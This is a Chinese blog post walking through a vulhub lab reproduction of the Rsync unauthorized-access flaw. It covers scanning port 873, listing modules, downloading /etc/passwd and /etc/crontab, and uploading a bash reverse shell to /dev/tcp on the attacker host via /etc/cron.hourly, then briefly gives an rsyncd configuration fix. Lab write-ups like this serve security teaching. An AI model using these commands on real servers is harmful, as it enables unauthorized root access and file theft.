Rsync反弹shell

最新推荐文章于 2024-03-09 12:15:00 发布
最新推荐文章于 2024-03-09 12:15:00 发布
阅读量871 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: Rsync
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84112341
版权

vulhub环境靶机 : 192.168.91.130
攻击机:kali 192.168.91.128

一、环境搭建

vulhub环境靶机环境搭建
​ 在纯净ubuntu中部署vulhub环境:

1、安装docker,并用docker -v命令验证安装结果;
​ curl -s https://get.docker.com/ | sh

在这里插入图片描述

2、安装python-pip,并用pip -V命令验证安装结果;
sudo apt-get install python-pip

在这里插入图片描述

​ 3、安装docker-compose,并用docker-compose -v验证安装结果
pip install docker-compose

在这里插入图片描述

4、将vulhub解压至ubuntu一个路径下:/vulhub-master/

5、进入到相应的漏洞下,docker-compose up -d命令启动容器,使用docker-compose down命令关闭容器。

在这里插入图片描述

sudo docker-compose up

在这里插入图片描述

二、Rsync非授权访问

1.可以对目标服务器进行扫描:
nmap -p  873 192.168.91.130

扫描结果:
在这里插入图片描述

2.查看模块名列表:
rsync rsync://192.168.91.130:873/

查看src模块

rsync rsync://192.168.91.130:873/src

结果如下:
在这里插入图片描述
可以看到目标机器的目录已经被列举出来了:

3.下载文件
rsync -av rsync://192.168.91.130/src/etc/passwd /root/passwd.txt

执行结果:
在这里插入图片描述

在这里插入图片描述

4.上传文件反弹shell

查看crontab配置文件:

rsync rsync://192.168.91.130/src/etc/crontab
5.下载crontab配置文件:
rsync -av rsync://192.168.91.130/src/etc/crontab /root/crontab.txt

查看其内容:
在这里插入图片描述

在这里插入图片描述
其中

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly

表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令
shell 写法如下:

#!/bin/bash 
/bin/bash -i >& /dev/tcp/192.168.91.128/4444 0>&1

赋予执行权限:

chmod +x shell

将shell上传至/etc/cron.hourly

rsync -av shell rsync://192.168.91.130/src/etc/cron.hourly

本地监听:

nc -nvv -lp 4444
7.实验可以自己去修改/etc/crontab配置文件

查看docker容器 ID

docker ps

在这里插入图片描述
进入docker

sudo docker exec -it a6cb5e784225  bash

在这里插入图片描述
打开/etc/crontab配置文件(vim自己安装。。)

vim /etc/crontab

把时间修改成自己想要的就好
在这里插入图片描述
等待时间的到来即可。成功反弹shell
在这里插入图片描述

三、修复

vim /etc/rsync.conf

写入以下代码

hosts allow xxx.xxx.xxx.xxx
auth users = rsync
secrets file = /etc/rsyncd.passwd

新建一个文件

vim /etc/rsyncd.passwd

按一下格式写入能登陆的用户名和密码

username  :password

就ok

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell
ADDPPC的博客
11-26 575
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
rsync未授权访问漏洞
Kevin's Blog
08-06 3208
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在未授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
rsync未授权访问漏洞利用
weixin_30681615的博客
11-24 1707
漏洞描述:rsync是Linux系统下的数据镜像备份工具,使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他ssh,rsync主机同步。也就是说如果你可以连接目标IP的rsync,那么你就可以上传恶意文件或下载目标IP上的任意文件(rsync默认是root权限),rsync默认端口号是873 漏洞利用:rsync默认匿名访问模式,因此我们就可以不需要认证直...
rsync 未授权访问漏洞
weixin_30387663的博客
01-11 176
rsync rsync,remote synchronize顾名思意就知道它是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。 rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,这样其保密性也非常好 rsync配置文件 配置文件 rsyncd.conf 由全局配置和若干模块配...
Rsync未授权访问
浅笑996的博客
11-19 5209
1.漏洞名称 Rsync 未授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
shell脚本实现通过Rsync批量同步Windows共享的文件夹
10-01
shell脚本实现通过Rsync批量同步Windows共享的文件夹 用到了循环和数组,通过mount.cifs挂载windows共享(老服务器SMB1.0也适用) 参考我自己写的文章: ...
Shell脚本实现监控rsync数据是否传输完
09-15
以下是一个简单的 `Shell` 脚本示例,用于监控 `rsync` 数据传输是否完成。 首先,我们需要理解脚本的基本逻辑。脚本的主要目标是检查两个条件:一是确认目标文件夹的大小是否与源文件夹一致,二是检查 `rsync` ...
rsync rpm安装包
09-07
rsync rpm安装包
hactar:使用 rsync 的增量每日备份脚本
06-12
使用 rsync 的增量每日备份脚本 版权所有 (c)2015 版本 1.01 这个脚本绝对没有保证。 这是免费软件,欢迎您在某些条件下重新分发它。 有关详细信息,请参阅 CC BY-NC-SA 4.0。 用法: hactar [OPTIONS] SOURCE ...
redis未授权访问反弹shell
18年3月萌新白帽子
06-26 4559
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
Rsync未授权访问 getshell——漏洞复现
W小哥
11-09 3725
一、 Rsync未授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
服务安全-应用协议rsync未授权&ssh漏洞复现
最新发布
Karka_的博客
03-09 827
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
渗透测试-应用协议安全Rsync&SSH&RDP&FTP
告白的博客
04-11 3374
在渗透测试中的信息收集的环节,对于端口的探针是一个重点关注的地方,不同的端口会有代表的不同的协议传输的服务,而对于这些一些常见的服务端口,我们需要对其进行的渗透测试做一个简要的汇总
phpinfo函数_文件包含之通过phpinfo去Getshell
weixin_39528994的博客
12-04 1828
1.phpinfo信息利用phpinfo文件泄露一直被大家所忽视,但其实phpinfo可以为攻击渗透测试人员提供很多的信息。1.system提供服务器所在的操作系统的信息。2.真实ip知道真实ip的我们可以省去cdn带来的各种困扰。我们同时也可以端口旁站一顿操作。3.web根目录网站绝对路径对渗透测试相当的有用,当你找到SQL注入点时,要上传木马的时候就需要知道网站的绝对路径才可以获取w...
shell脚本自动安装rsync
08-24
你可以使用以下 shell 脚本来自动安装 rsync: ```bash #!/bin/bash # 检查是否已安装 rsync if ! command -v rsync &> /dev/null; then echo "rsync 未安装,开始安装..." # 更新软件包列表 sudo apt update ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值